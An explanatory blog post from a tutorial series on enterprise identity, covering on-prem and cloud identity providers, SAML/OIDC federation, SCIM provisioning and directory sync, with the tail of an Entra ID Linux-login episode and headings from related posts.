Framework Alignment

Domain	Relevance
CISSP Domain 5: Identity and Access Management	Entra ID Linux login centralizes Linux VM access in the same IAM system as all other enterprise resources — one policy engine, one audit log
CISSP Domain 3: Security Architecture and Engineering	Eliminating per-VM local accounts removes a class of credential management risk — no SSH keys to rotate, no local accounts to audit
CISSP Domain 1: Security and Risk Management	Conditional Access Policies enforcing MFA on Linux logins reduce the risk of credential-based compromise of cloud VMs

Key Takeaways

Entra ID Linux login uses OIDC device code flow — no LDAP, no Kerberos, no local Linux accounts
aad-auth package installs pam_aad.so and handles the full authentication stack: token issuance, validation, user cache, UID mapping
VM access is controlled by Azure RBAC roles (Virtual Machine Administrator Login / Virtual Machine User Login) — not by sudoers files
Conditional Access Policies apply to Linux VM logins — MFA, device compliance, and location restrictions use the same engine as every other Entra ID app
Debugging starts in Entra ID Sign-in logs (Azure Portal), not in /var/log/auth.log

What’s Next

EP12 showed how Entra ID enables Linux logins in the cloud. EP13 is the series closer: Zero Trust identity — what it means to verify identity continuously, how SPIFFE and SPIRE handle workload (non-human) identity, and where the stack goes from /etc/passwd in 1970 to a Zero Trust policy engine in 2026.

Next: Zero Trust Identity: SPIFFE, SPIRE, mTLS, and Continuous Verification

Get EP13 in your inbox when it publishes → linuxcent.com/subscribe

Identity Providers Explained: On-Prem, Cloud, SCIM, and Federation

May 10, 2026May 8, 2026 by Vamshi Krishna Santhapuri

Reading Time: 6 minutes

The Identity Stack, Episode 11
EP10: SAML/OIDC → EP11 → EP12: Entra ID + Linux → …

TL;DR

An Identity Provider (IdP) is the system that authenticates users and issues identity assertions (SAML assertions, OIDC tokens) to applications
On-prem IdPs: AD FS (Microsoft), Shibboleth (universities), Keycloak (open source), Ping Identity — they sit in front of AD and speak SAML/OIDC to cloud apps
Cloud IdPs: Okta, Entra ID (Azure AD), Google Workspace, Ping Identity Cloud — they are the directory and the authentication layer in one
Federation: IdPs can trust each other — a corporate IdP can delegate to a cloud IdP, or federate with a partner org’s IdP
SCIM (System for Cross-domain Identity Management) is provisioning, not authentication — it creates/updates/deactivates user accounts in target systems when the source directory changes
The key distinction: federation (authentication flow) vs directory sync (data copy) — they solve different problems and are often deployed together

The Big Picture: Where IdPs Sit

                        On-prem Directory
                        (Active Directory / OpenLDAP / FreeIPA)
                               │
                               │ LDAP / Kerberos
                               ▼
                         Identity Provider
                         ┌──────────────────────────────────┐
                         │  AD FS / Keycloak / Okta /       │
                         │  Entra ID Connect / Shibboleth   │
                         │                                  │
                         │  Speaks: SAML 2.0 + OIDC + OAuth2│
                         └────────────────┬─────────────────┘
                                          │ assertions / tokens
                      ┌───────────────────┼───────────────────┐
                      ▼                   ▼                   ▼
               Salesforce          GitHub Enterprise      AWS IAM
               (SAML SP)           (OIDC RP)              (OIDC)

EP10 covered the protocols. This episode covers the systems — what an IdP actually does, how the major ones differ, and how they connect to each other through federation and SCIM.

On-Premises Identity Providers

AD FS (Active Directory Federation Services)

AD FS is Microsoft’s on-prem federation server — a Windows Server role that sits in front of Active Directory and speaks SAML 2.0 and OIDC to external applications.

What it does:
– Authenticates users against AD (Kerberos/LDAP behind the scenes)
– Issues SAML assertions and OIDC tokens to external SPs
– Handles claims transformation: maps AD attributes to what the SP expects

What it doesn’t do well:
– It’s Windows Server only
– Configuration is complex (XML, certificates, claim rule language)
– No built-in MFA (requires Azure MFA or a third-party provider)
– Being deprecated in favor of Entra ID for most use cases

AD FS made sense when everything was on-prem. As workloads move to cloud, Entra ID Connect (a lighter sync agent) combined with Entra ID as the IdP replaces AD FS for most enterprises.

Keycloak

Keycloak is the open-source IdP from Red Hat. It’s what FreeIPA uses for web-based OIDC/SAML SSO, and it’s widely deployed independently for organizations that want full control over their identity infrastructure.

# Run Keycloak in development mode (Docker)
docker run -p 8080:8080 \
  -e KEYCLOAK_ADMIN=admin \
  -e KEYCLOAK_ADMIN_PASSWORD=admin \
  quay.io/keycloak/keycloak:latest \
  start-dev

# Keycloak concepts:
# Realm     — an isolated namespace (like a tenant)
# Client    — an application that uses Keycloak for auth (SP/RP)
# User federation — connect Keycloak to an existing LDAP/AD directory
# Identity brokering — federate with external IdPs (Google, GitHub, another SAML IdP)

Keycloak reads users from AD/LDAP via its User Federation feature — it doesn’t replace the directory, it federates it. Users still live in AD; Keycloak issues SAML/OIDC tokens based on those users.

Shibboleth

Shibboleth is the dominant IdP in academia. Most universities run it. It’s SAML-native, designed for federation between institutions — a student can authenticate at their home university’s IdP and access resources at a partner institution.

Cloud Identity Providers

Okta

Okta is a cloud IdP + directory. It can:
– Act as the primary user directory (storing users, credentials)
– Connect to on-prem AD via the Okta Active Directory Agent (a lightweight sync service)
– Federate with other IdPs (act as IdP or SP in a SAML/OIDC chain)
– Enforce MFA, Adaptive Authentication, Device Trust

Okta’s Lifecycle Management handles provisioning: when a user is created/disabled in Okta (or synced from AD), Okta can automatically create/deactivate accounts in downstream SaaS apps — via SCIM or app-specific APIs.

Entra ID (Azure Active Directory)

Entra ID is Microsoft’s cloud IdP. It’s both a directory (stores users, groups) and an IdP (issues tokens). For organizations running on-prem AD, Entra ID Connect syncs users from AD to Entra ID.

Entra ID is OIDC and OAuth2 native — it speaks SAML for legacy apps but JWT/OIDC for everything modern. Its OIDC implementation follows the standard closely; its token validation happens via /.well-known/openid-configuration and the JWKS endpoint.

On-prem AD  →  Entra ID Connect (sync agent)  →  Entra ID (cloud)
                                                      │
                                              SAML / OIDC
                                                      │
                                            SaaS apps, Azure resources

Google Workspace

Google Workspace is Google’s combined directory + IdP. Google accounts are the users. Apps integrate via SAML or OIDC. Google’s OIDC implementation is one of the most widely used reference implementations — most OIDC libraries are tested against it.

Federation: IdPs Trusting Each Other

Federation is the mechanism that lets IdPs delegate to each other. Two patterns:

SAML Federation (IdP-to-IdP)

Common in academia and partner integrations:

User at University A → requests resource at University B
                              │
                              │ doesn't know user
                              ▼
                    University B SP redirects to...
                    Discovery Service: "which IdP are you from?"
                              │
                              ▼
                    University A IdP authenticates user
                              │
                    Sends SAML assertion to University B SP

University B’s SP trusts University A’s IdP because both are members of a SAML federation (e.g., InCommon in the US, eduGAIN globally). The federation metadata aggregates all members’ SAML metadata — certificates, endpoints — so members don’t have to manually configure each bilateral trust.

OIDC Identity Brokering

Keycloak, Okta, and Entra ID can all act as identity brokers — they sit between the application and the actual authenticating IdP:

App (OIDC RP) → Keycloak (broker IdP) → Google / GitHub / SAML IdP
                                               │ authenticate
                                               ▼
                                      Keycloak receives assertion
                                      Maps external claims to local claims
                                      Issues OIDC token to app

The app only knows Keycloak. Keycloak handles the upstream IdP complexity.

SCIM: Provisioning ≠ Authentication

SCIM (RFC 7644) is a REST API standard for user lifecycle management — creating, updating, and deactivating user accounts in a target system when changes happen in the source directory.

Source (Okta / Entra ID)           Target (Slack / GitHub / Jira)
         │                                    │
         │  SCIM 2.0 (REST + JSON)            │
         ├─ POST /Users  ─────────────────────► create user
         ├─ PATCH /Users/id ──────────────────► update attributes
         └─ DELETE /Users/id ─────────────────► deactivate account

SCIM is not SSO. A SCIM-provisioned user in Slack can log in to Slack — but the authentication still goes through the IdP (SAML/OIDC). SCIM ensures the account exists. The IdP proves the user’s identity.

Why both? Because SSO alone doesn’t create accounts in target systems — it just authenticates to them. If a user tries to log in to Slack for the first time via SSO, Slack needs an account to map them to. SCIM creates that account before the first login (Just-in-Time provisioning handles it at first login, but SCIM handles it in bulk and handles deprovisioning reliably).

Deprovisioning is where SCIM matters most. When an employee leaves, you disable them in Okta — SCIM deactivates their account in every connected app within minutes. Without SCIM, IT runs a manual checklist. Someone misses Jira. The ex-employee has access for three weeks.

Directory Sync vs Federation

These are commonly confused:

Directory sync — copy user data from source to target. Entra ID Connect copies users from on-prem AD to Entra ID. This is not authentication; it’s data replication. After sync, Entra ID has its own copy of the user record.

Federation — delegate authentication to an external IdP. The target system doesn’t store credentials; it redirects to the IdP for authentication and trusts the assertion that comes back.

You often need both:
– Sync: so the target system has the user record and can enforce policies (group membership, license assignment)
– Federation: so the user authenticates against the source of truth (your IdP) rather than maintaining a separate password in every system

⚠ Common Misconceptions

“SCIM is an authentication protocol.” SCIM is a provisioning protocol. It creates and manages accounts. Authentication is SAML/OIDC. Both solve different parts of the identity lifecycle problem.

“SSO means you only have one password.” SSO means you only authenticate once per session. The password still exists (at the IdP). SSO reduces the number of authentication events, not the number of credentials.

“On-prem IdP + cloud sync is the same as a cloud IdP.” With on-prem IdP + cloud sync (e.g., AD + Entra ID Connect), authentication happens via the on-prem IdP — if it goes down, cloud SSO breaks. A pure cloud IdP (Okta standalone, Entra ID without on-prem AD) authenticates entirely in the cloud.

Framework Alignment

Domain	Relevance
CISSP Domain 5: Identity and Access Management	IdPs are the central control plane for federated identity — their architecture, trust relationships, and provisioning workflows define the enterprise IAM posture
CISSP Domain 1: Security and Risk Management	SCIM-based deprovisioning is an access control risk management practice — without it, terminated employee access persists across connected systems
CISSP Domain 3: Security Architecture and Engineering	The choice of on-prem vs cloud IdP, federation vs sync, and SCIM vs JIT provisioning are architectural decisions with long-term operational and security implications

Key Takeaways

An IdP authenticates users and issues assertions (SAML) or tokens (OIDC/OAuth2) — applications trust the IdP, not the user directly
On-prem: AD FS (Windows/legacy), Keycloak (open source, flexible), Shibboleth (academia)
Cloud: Okta (cloud-native, strong lifecycle management), Entra ID (Microsoft-integrated), Google Workspace
Federation = authentication delegation between IdPs; Directory sync = data replication; SCIM = account lifecycle (provisioning/deprovisioning)
SCIM deprovisioning is the critical control — it ensures ex-employees lose access automatically across all connected systems

What’s Next

EP11 covered the IdP landscape. EP12 gets specific: Entra ID and Linux — how you configure a Linux VM to accept SSH logins authenticated against Azure AD credentials, and how the aad-auth / pam_aad stack works end to end.

Next: Entra ID Linux Login: SSH Authentication with Azure AD Credentials

Get EP12 in your inbox when it publishes → linuxcent.com/subscribe

TL;DR

The Series Arc, Inverted

The Architecture

Installation

The Three Extension Points

1. Blueprints — the extension point with no code in it

2. Provider Plugins

3. Pipeline Integrations

The Open-Core Model

What This Series Taught

What’s Next

Write the next blueprint

Elsewhere on the blog

TL;DR

Quick Check: What Flow Data Is Your Cluster Already Collecting?

Why Application-Level Metrics Miss What the Kernel Sees

How TC Hook Flow Programs Work

What Retransmit Telemetry Actually Reveals

How Cilium Hubble Collects Flow Data

Writing a Minimal Flow Observer with bpftrace

⚠ Production Gotchas

Quick Reference

Key Takeaways

What’s Next

TL;DR

The Big Picture

Why These Breaches Are the Curriculum

December 2020: SolarWinds — Supply Chain at Scale

December 2021: Log4Shell — Injection in a Logging Library

September 2022: Uber — MFA Fatigue Meets Hardcoded Credentials

January 2023: CircleCI — Session Token Theft and Secret Exfiltration

October 2023: Okta — Support System Compromise

April 2024: XZ Utils — Two Years of Social Engineering

The Three Root Causes: A Framework for Your Exercise Backlog

Run This in Your Own Environment: Breach Scenario Self-Assessment

⚠ Common Mistakes When Using Breach History as a Training Resource

Quick Reference

Key Takeaways

What’s Next

TL;DR

The Problem: A Grade No One Checks Is Decoration

The Pipeline API

The detail that will silently break your gate

Two thresholds, not one

GitHub Actions Integration

GitLab CI Integration

What the Failed Gate Tells You

Thresholds by Environment

Production Gotchas

Key Takeaways

What’s Next

TL;DR

The Big Picture

Why Engineers Treat OWASP as a Web-App-Only Concern

A01: Broken Access Control — IAM Wildcards and Public S3

A02: Cryptographic Failures — Plaintext Secrets and Weak KMS Config

A03: Injection — Log4Shell and SSRF as Injection Variants

A04: Insecure Design — Privileged Containers and Missing Runtime Controls

A05: Security Misconfiguration — Default Kubernetes RBAC and Open Ports

A06: Vulnerable and Outdated Components — Transitive Dependencies and Base Images

A07: Identification and Authentication Failures — MFA Fatigue and Stolen Tokens

A08: Software and Data Integrity Failures — Compromised Build Pipelines

A09: Security Logging and Monitoring Failures — What You Can’t See, You Can’t Stop

A10: Server-Side Request Forgery (SSRF) — EC2 Metadata and IMDSv1

The Series Attack Map: Which Episodes Cover Which Categories

Run This in Your Own Environment: OWASP Coverage Self-Assessment

⚠ Common Mistakes When Mapping OWASP to Infrastructure

Quick Reference

Key Takeaways

What’s Next

TL;DR

The Problem: A Grade That’s Never Been Verified Is Not a Grade

How Automated OpenSCAP Compliance Works

The A-F Grade Calculation

Where the Scan Surface Actually Lives

SARIF Export

Drift: Comparing Against a Baseline

What Controls Typically Block an A Grade

Key Takeaways

What’s Next